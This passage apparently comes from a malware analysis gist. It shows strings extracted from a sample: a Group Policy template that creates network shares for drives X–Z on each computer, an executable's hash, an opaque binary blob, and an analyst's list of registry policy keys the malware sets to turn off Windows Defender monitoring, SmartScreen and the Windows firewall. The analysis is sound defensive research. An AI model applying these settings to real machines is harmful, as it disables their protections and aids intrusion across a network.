abe="NO_CHANGE"/></NetShare>\r\n\t<NetShare clsid="{2888C5E7-94FC-4739-90AA-2C1536D68BC0}" image="2" 
name="%%ComputerName%%_X" changed="%s" uid="%s"><Properties action="U" name="%%ComputerName%%_X" path="X:" comment="" allRegular="0" allHidden="0" allAdminDrive="0" limitUsers="NO_CHANGE" abe="NO_CHANGE"/></NetShare>\r\n\t<NetShare clsid="{2888C5E7-94FC-4739-90AA-2C1536D68BC0}" image="2" name="%%ComputerName%%_Y" changed="%s" uid="%s"><Properties action="U" name="%%ComputerName%%_Y" path="Y:" comment="" allRegular="0" allHidden="0" allAdminDrive="0" limitUsers="NO_CHANGE" abe="NO_CHANGE"/></NetShare>\r\n\t<NetShare clsid="{2888C5E7-94FC-4739-90AA-2C1536D68BC0}" image="2" name="%%ComputerName%%_Z" changed="%s" uid="%s"><Properties action="U" name="%%ComputerName%%_Z" path="Z:" comment="" allRegular="0" allHidden="0" allAdminDrive="0" limitUsers="NO_CHANGE" abe="NO_CHANGE"/></NetShare>\r\n</NetworkShareSettings>\r\n'

'[{\x000\x000\x000\x00\x000'


onboard EXE: d641ad955ef4cff5f0239072b3990d47e17b9840e07fd5feea93c372147313c5


'\xf7\xd233c\xe1ul\x0f\xda\xd6\xbf\x18*"^\x1c\x05\xbe\xe8\x04\x06P\x94\xf0\xd1|\xfaz~-\xc3/\xd4J\xb3]\xde\x9adXd!I\x87\xe8\xfe]g\xf0XP\xcfbeQ\xae\x19\xd8zY}\xdc\'\xa8\xd3\xa5|\x15\x0e\xe7S\x00f\xbd\xa3\xaab^\xe1|J\xbc/\x02~\xc4J\xec\xe0rKA\x86m\xea\xc1R\x1e\x9a4B\x12pLVf\xa2\xfd3,\xca\x91\x14\x1a6=)\x11M >\xddK\xa5x\xbd\x95\x8c\x9d\xd9 \x8f\xd5c\xbf\xdfPGU\r\xfc\xd0\xc1\x15\x06l5Ex\xf2\xb1\x0cCV\xfb\x9f\x06|\x08\xcb\xa4i-:m\x92\x128N\xb9\xdaU{j\xd3\xef\xab\x89\xea\xbb\xf9\xeb\xbb\x10\xb8~lf\xc9j\xe6\xe97\xfe>\x94\x8e\x91\xf5&\xb2vt\xc9\x91/\x02\xfc\xc9bv\xa9\x85f\xa4l\xb5{\xd2\x8c\xe9\xe2\xebZ\x95\x02Q\x05\xedE\xd3\xe8\x15\xfec\xca\x80\x9a\xc6\x10\x97/\x14O\x9c\xbf\x98\xc8w\xb9\xaf\xea\x0b\x8f\xcd@!ux\x83\xd6\x12\x05\xf9Un\x12\xba\xf7\xbe@\xe4\x9f8\xfa\xf1#!\xda\xf8\x7f\xe9\xfb\x80\xc3\x7f\xbe\x98D\x92\x82\xf8\\s\x96t)\xc5\xbd\xca\x10\xf7\x8e[i\xb6\xe9\x16\x95\xdc:\x97n\x8b\x9e\x949n\xd0$\t*\xda\xf4o\xd5\xa5\x94\x01o3*\x90\nq\\FJ\xaf\x85\x81\xfc\xea\x04%\xe9\x1ev\xd9\xdcY\x95V\xd7dc\x86]\xcct\xc2&t\xb9*\xde]\xda\x9f\x8e%\xadwD\x7f!\xb5V`\x93\xc8\x98P@\x11\xf5I-O\xa7\xe3&\x83J\x15\x8d\xfb\xe5.\x0c\xf2}N\xe80J\xf15}\x15H\x83\x13\x14\xbe\x02\xae\x9c\x85\xa1d\xc9#\xc1\x10(\xfc\x1d\xc0'





sysopfb commented Jul 11, 2022

Registry block related to security-service keys:

SOFTWARE\\Policies\\Microsoft\\Windows\\System;GroupPolicyRefreshTimeDC;
SOFTWARE\\Policies\\Microsoft\\Windows\\System;GroupPolicyRefreshTimeOffsetDC;
SOFTWARE\\Policies\\Microsoft\\Windows\\System;GroupPolicyRefreshTime;
SOFTWARE\\Policies\\Microsoft\\Windows\\System;GroupPolicyRefreshTimeOffset;
SOFTWARE\\Policies\\Microsoft\\Windows\\System;EnableSmartScreen;
SOFTWARE\\Policies\\Microsoft\\Windows\\System;**del.ShellSmartScreenLevel;
SOFTWARE\\Policies\\Microsoft\\Windows Defender;DisableAntiSpyware;
SOFTWARE\\Policies\\Microsoft\\Windows Defender;DisableRoutinelyTakingAction;
SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection;DisableRealtimeMonitoring;
SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection;DisableBehaviorMonitoring;
SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Spynet;SubmitSamplesConsent;
SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Spynet;SpynetReporting;
SOFTWARE\\Policies\\Microsoft\\WindowsFirewall\\DomainProfile;EnableFirewall;
SOFTWARE\\Policies\\Microsoft\\WindowsFirewall\\StandardProfile;EnableFirewall;
